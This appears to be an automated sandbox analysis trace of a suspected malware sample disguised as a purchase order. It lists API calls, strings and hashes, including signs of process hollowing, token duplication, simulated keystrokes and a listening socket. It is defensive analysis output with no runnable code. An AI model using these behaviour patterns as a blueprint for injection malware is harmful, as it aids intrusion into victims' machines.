                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: FreeInfoLibraryParametersSystem
                                  • String ID:
                                  • API String ID: 3403648963-0
                                  APIs
                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                  • __lock_file.LIBCMT ref: 00414A8D
                                    • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                  • __fclose_nolock.LIBCMT ref: 00414A98
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                  • String ID:
                                  • API String ID: 2800547568-0
                                  APIs
                                  • __lock_file.LIBCMT ref: 00415012
                                  • __ftell_nolock.LIBCMT ref: 0041501F
                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                  • String ID:
                                  • API String ID: 2999321469-0
                                  APIs
                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 04001ACB
                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04001B61
                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04001B83
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1475151647.0000000004000000.00000040.00000020.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4000000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                  • String ID:
                                  • API String ID: 2438371351-0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: _memmove
                                  • String ID:
                                  • API String ID: 4104443479-0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: ProtectVirtual
                                  • String ID:
                                  • API String ID: 544645111-0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _memmove.LIBCMT ref: 00444B34
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: _malloc_memmove
                                  • String ID:
                                  • API String ID: 1183979061-0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: __lock_file
                                  • String ID:
                                  • API String ID: 3031932315-0
                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  • _memmove.LIBCMT ref: 00428939
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: std::exception::exception$Exception@8Throw_malloc_memmove
                                  • String ID:
                                  • API String ID: 620504543-0
                                  APIs
                                    • Part of subcall function 00479500: VariantInit.OLEAUT32(?), ref: 0047950F
                                    • Part of subcall function 00437063: VariantClear.OLEAUT32(00479459), ref: 0043706B
                                    • Part of subcall function 00437063: VariantCopy.OLEAUT32(00479459,00470E7C), ref: 00437076
                                  • VariantClear.OLEAUT32(?), ref: 0047973E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Variant$Clear$CopyInit
                                  • String ID:
                                  • API String ID: 24293632-0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __wfsopen
                                  • String ID:
                                  • API String ID: 197181222-0
                                  APIs
                                  • Sleep.KERNELBASE(000001F4), ref: 04002321
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1475151647.0000000004000000.00000040.00000020.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4000000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  APIs
                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                  • NtdllDialogWndProc_W.USER32(?,0000004E,?,?), ref: 0047C8FC
                                  • GetKeyState.USER32(00000011), ref: 0047C92D
                                  • GetKeyState.USER32(00000009), ref: 0047C936
                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                  • GetKeyState.USER32(00000010), ref: 0047C953
                                  • 742845F0.USER32(00000002,000000F0), ref: 0047C967
                                  • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                  • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                  • _wcsncpy.LIBCMT ref: 0047CA29
                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                  • SendMessageW.USER32 ref: 0047CA7F
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                  • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                  • 6FE0CB00.COMCTL32(00C368F0,00000000,00000000,00000000), ref: 0047CB9B
                                  • 6FE0C2F0.COMCTL32(00C368F0,00000000,000000F8,000000F0), ref: 0047CBAC
                                  • SetCapture.USER32(?), ref: 0047CBB6
                                  • ClientToScreen.USER32(?,?), ref: 0047CC17
                                  • 6FE0C530.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                  • ReleaseCapture.USER32 ref: 0047CC3A
                                  • GetCursorPos.USER32(?), ref: 0047CC72
                                  • ScreenToClient.USER32(?,?), ref: 0047CC80
                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                  • SendMessageW.USER32 ref: 0047CD12
                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                  • SendMessageW.USER32 ref: 0047CD80
                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                  • GetCursorPos.USER32(?), ref: 0047CDC8
                                  • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                  • GetParent.USER32(00000000), ref: 0047CDF7
                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                  • SendMessageW.USER32 ref: 0047CE93
                                  • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,019E1CA8,00000000,?,?,?,?), ref: 0047CF1C
                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                  • SendMessageW.USER32 ref: 0047CF6B
                                  • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,019E1CA8,00000000,?,?,?,?), ref: 0047CFE6
                                  • 742845F0.USER32(?,000000F0), ref: 0047D086
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$ClientScreen$State$742845CaptureCursorMenuPopupTrack$C530DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                  • String ID: @GUI_DRAGID$F
                                  • API String ID: 144575006-4164748364
                                  APIs
                                  • GetForegroundWindow.USER32 ref: 00434420
                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                  • IsIconic.USER32(?), ref: 0043444F
                                  • ShowWindow.USER32(?,00000009), ref: 0043445C
                                  • SetForegroundWindow.USER32(?), ref: 0043446A
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                  • GetCurrentThreadId.KERNEL32 ref: 00434485
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                  • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                  • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                  • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                  • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                  • keybd_event.USER32(00000012,00000000), ref: 00434514
                                  • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                  • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                  • String ID: Shell_TrayWnd
                                  • API String ID: 2889586943-2988720461
                                  APIs
                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                  • CloseHandle.KERNEL32(?), ref: 004463A0
                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                  • GetProcessWindowStation.USER32 ref: 004463D1
                                  • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                  • _wcslen.LIBCMT ref: 00446498
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _wcsncpy.LIBCMT ref: 004464C0
                                  • 74FD5590.USERENV(?,00000020), ref: 004464D9
                                  • 74FD7ED0.USERENV(?,?,00000000), ref: 004464F3
                                  • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                  • 74FD5030.USERENV(?,?), ref: 00446555
                                  • CloseWindowStation.USER32(00000000), ref: 0044656C
                                  • CloseDesktop.USER32(?), ref: 0044657A
                                  • SetProcessWindowStation.USER32(?), ref: 00446588
                                  • CloseHandle.KERNEL32(?), ref: 00446592
                                  • 74FD7F30.USERENV(?), ref: 004465A9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: StationWindow$CloseProcess$DesktopHandleOpen$CreateD5030D5590DuplicateTokenUser_malloc_wcslen_wcsncpy
                                  • String ID: $@OH$default$winsta0
                                  • API String ID: 2978692741-3791954436
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                  • FindClose.KERNEL32(00000000), ref: 00478924
                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                  • __swprintf.LIBCMT ref: 004789D3
                                  • __swprintf.LIBCMT ref: 00478A1D
                                  • __swprintf.LIBCMT ref: 00478A4B
                                  • __swprintf.LIBCMT ref: 00478A79
                                    • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                    • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                  • __swprintf.LIBCMT ref: 00478AA7
                                  • __swprintf.LIBCMT ref: 00478AD5
                                  • __swprintf.LIBCMT ref: 00478B03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                  • API String ID: 999945258-2428617273
                                  APIs
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                  • __wsplitpath.LIBCMT ref: 00403492
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • _wcscpy.LIBCMT ref: 004034A7
                                  • _wcscat.LIBCMT ref: 004034BC
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                  • _wcscpy.LIBCMT ref: 004035A0
                                  • _wcslen.LIBCMT ref: 00403623
                                  • _wcslen.LIBCMT ref: 0040367D
                                  Strings
                                  • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                  • Error opening the file, xrefs: 00428231
                                  • _, xrefs: 0040371C
                                  • Unterminated string, xrefs: 00428348
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                  • API String ID: 3393021363-188983378
                                  APIs
                                  • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                  • GetFocus.USER32 ref: 0046A0DD
                                  • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessagePost$CtrlFocus
                                  • String ID: 0
                                  • API String ID: 1534620443-4108050209
                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                  • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                  • FindClose.KERNEL32(00000000), ref: 00431B20
                                  • FindClose.KERNEL32(00000000), ref: 00431B34
                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                  • FindClose.KERNEL32(00000000), ref: 00431BCD
                                  • FindClose.KERNEL32(00000000), ref: 00431BDB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                  • String ID: *.*
                                  • API String ID: 1409584000-438819550
                                  APIs
                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                  • __swprintf.LIBCMT ref: 00431C2E
                                  • _wcslen.LIBCMT ref: 00431C3A
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                  Similarity
                                  • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                  • String ID: :$\$\??\%s
                                  • API String ID: 2192556992-3457252023
                                  APIs
                                  • GetLocalTime.KERNEL32(?), ref: 004722A2
                                  • __swprintf.LIBCMT ref: 004722B9
                                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                  • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                  • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                  • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                  • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                  • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                  • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                  • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                  • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                  Similarity
                                  • API ID: FolderPath$LocalTime__swprintf
                                  • String ID: %.3d
                                  • API String ID: 3337348382-986655627
                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                  • FindClose.KERNEL32(00000000), ref: 0044291C
                                  • FindClose.KERNEL32(00000000), ref: 00442930
                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                  • FindClose.KERNEL32(00000000), ref: 004429D4
                                    • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                  • FindClose.KERNEL32(00000000), ref: 004429E2
                                  Similarity
                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                  • String ID: *.*
                                  • API String ID: 2640511053-438819550
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                  • GetLastError.KERNEL32 ref: 00433414
                                  • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                  • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                  • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                  Similarity
                                  • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                  • String ID: SeShutdownPrivilege
                                  • API String ID: 2938487562-3733053543
                                  APIs
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                    • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                    • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                  • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                  • GetLengthSid.ADVAPI32(?), ref: 00446241
                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                  • CopySid.ADVAPI32(00000000), ref: 00446271
                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                  Similarity
                                  • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                  • String ID:
                                  • API String ID: 1255039815-0
                                  APIs
                                  • __swprintf.LIBCMT ref: 00433073
                                  • __swprintf.LIBCMT ref: 00433085
                                  • __wcsicoll.LIBCMT ref: 00433092
                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                  • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                  • LockResource.KERNEL32(00000000), ref: 004330CA
                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                  • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                  • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                  • LockResource.KERNEL32(?), ref: 00433120
                                  Similarity
                                  • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                  • String ID:
                                  • API String ID: 1158019794-0
                                  Similarity
                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                  • String ID:
                                  • API String ID: 1737998785-0
                                  APIs
                                    • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                    • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                  • NtdllDialogWndProc_W.USER32(?,00000205,?,?), ref: 00471145
                                  • 6FE0C580.COMCTL32(00000000), ref: 00471163
                                  • 6FE0C6F0.COMCTL32 ref: 00471169
                                  • ReleaseCapture.USER32 ref: 0047116F
                                  • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                  Similarity
                                  • API ID: AsyncState$C580CaptureClientCursorDialogMessageNtdllProc_ReleaseScreenSendTextWindow
                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                  • API String ID: 4205032950-2107944366
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                  • GetLastError.KERNEL32 ref: 0045D6BF
                                  • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                  Similarity
                                  • API ID: Error$Mode$DiskFreeLastSpace
                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                  • API String ID: 4194297153-14809454
                                  Similarity
                                  • API ID: _memmove$_strncmp
                                  • String ID: @oH$\$^$h
                                  • API String ID: 2175499884-3701065813
                                  • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                  • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                  • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                  • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                  APIs
                                  • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                  • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                  • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                  • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                  • listen.WSOCK32(00000000,00000005), ref: 00465381
                                  • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                  • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                  Similarity
                                  • API ID: ErrorLast$closesocket$bindlistensocket
                                  • String ID:
                                  • API String ID: 540024437-0
                                  • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                  • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                  • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                  • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                  Strings
                                  Similarity
                                  • API ID:
                                  • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                  • API String ID: 0-2872873767
                                  • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                  • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                  • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                  • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                  APIs
                                  • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                  • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                  • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                  • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                  • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                  • NtdllDialogWndProc_W.USER32(?,00000005,?,?), ref: 00440817
                                  Similarity
                                  • API ID: MessageSendWindow$DialogInvalidateMetricsMoveNtdllProc_RectShowSystem
                                  • String ID:
                                  • API String ID: 2044739998-0
                                  • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                  • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                  • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                  • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                  • __wsplitpath.LIBCMT ref: 00475644
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • _wcscat.LIBCMT ref: 00475657
                                  • __wcsicoll.LIBCMT ref: 0047567B
                                  • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                  • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                  • String ID:
                                  • API String ID: 2547909840-0
                                  • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
